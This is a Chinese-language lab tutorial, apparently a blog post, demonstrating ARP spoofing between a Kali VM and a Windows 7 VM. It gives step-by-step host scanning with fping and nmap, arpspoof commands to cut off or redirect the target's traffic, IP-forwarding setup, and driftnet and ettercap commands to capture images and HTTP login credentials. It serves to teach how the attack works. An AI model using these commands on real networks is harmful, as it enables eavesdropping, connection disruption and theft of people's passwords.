声明:本文中所有的命令开头均为小写,大写是文本粘贴时自动转换的
arp欺骗简介:主机和外部通信时需要获取网关的mac地址,通过在局域网广播arp请求包(含有网关ip)获得arp响应包(网关mac地址)的形式更新本地arp路由表,由于主机不会对arp响应包进行身份验证所以攻击主机可以通过向目标主机发送arp响应包(包含本机的mac地址)并且向网关进行arp请求轰炸的形式让目标主机得不到网关的arp响应,错误的把攻击主机当成网关,导致目标主机的所有流量都会经过攻击主机,这时攻击主机就可以监听目标主机的所有通信信息,从而实行断网或数据截取操作
环境配置
| kali虚拟机 | ip地址:192.168.232.129 |
| Win7虚拟机 | IP地址:192.168.232.128 |
| 网关 | ip地址:192.168.232.2 |
确保两个虚拟机之间能够ping通
1.开启目标主机和攻击主机并获取网络信息
查看目标主机的网络信息
| Ipconfig /all | |
| Arp -a | 查看本地路由表 |
查看kali主机的网络信息
测试攻击主机和目标主机是否可以正常通信(同一网段)
| Ping 192.168.232.129 | 目标主机中输入 |
| Arp -a |
发现两主机之间可以ping通,目标主机中也出现了攻击主机的信息
2.扫描网络内的活跃主机信息
方法1
| Fping -a -g 192.168.232.0/24 >result | 将扫描结果写进result文件中 -a:扫描存活主机信息 -g:扫描整个网段 |
| Cat /home/kali/result | 查看result文件 |
方法2
| Nmap -sP 192.168.232.0/24 | ping的方式检测活跃主机信息 |
| Nmap -sS 192.168.232.0/24 | 发送syn请求的方式检测活跃主机信息,更不容易发现,扫描更彻底 |
3.开始进行arp欺骗
首先让目标主机进行外部通信
| Ping baidu.com -t | 持续访问百度,能上网 |
查看kali主机的ip_forward值
| Cat /proc/sys/net/ipv4/ip_forward | 查看是否开启流量转发 |
开始断网攻击
| Arpspoof -i eth0 -t 192.168.232.128 192.168.232.2 | -i:指定网卡 -t:目标ip 网关ip |
现在开启arp流量转发,监听信息
方法1:
| Echo 1 > /proc/sys/net/ipv4/ip_forward | 临时开启流量转发(重新开机会重置为0) |
| Cat /proc/sys/net/ipv4/ip_forward |
方法2:
| Vim /etc/sysctl.conf | 永久修改ip_foward值 |
| Net.ipv4.ip_foward=1 | 将这句语句前面的#去掉就行 |
| Sysctl -p | 使改变生效,这里不进行演示 |
此时再进行arp欺骗
kali主机
Arpspoof -i eth0 -t 192.168.232.128 192.168.232.2
目标主机
| Arp -a | 路由表已经改变,arp欺骗成功 |
| Ping baidu.com | 能ping通百度说明此时还能正常上网 |
截取目标主机访问的图片信息
| http图片测试网站 | |
| Driftnet -i eth0 | 只能抓取http网站的图片 |
https://passport.shiyanbar.com/
截取http网站输入的账号密码数据
| 测试的网址 | |
| Ettercap -Tq -i eth0 |
扫一扫
5256
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
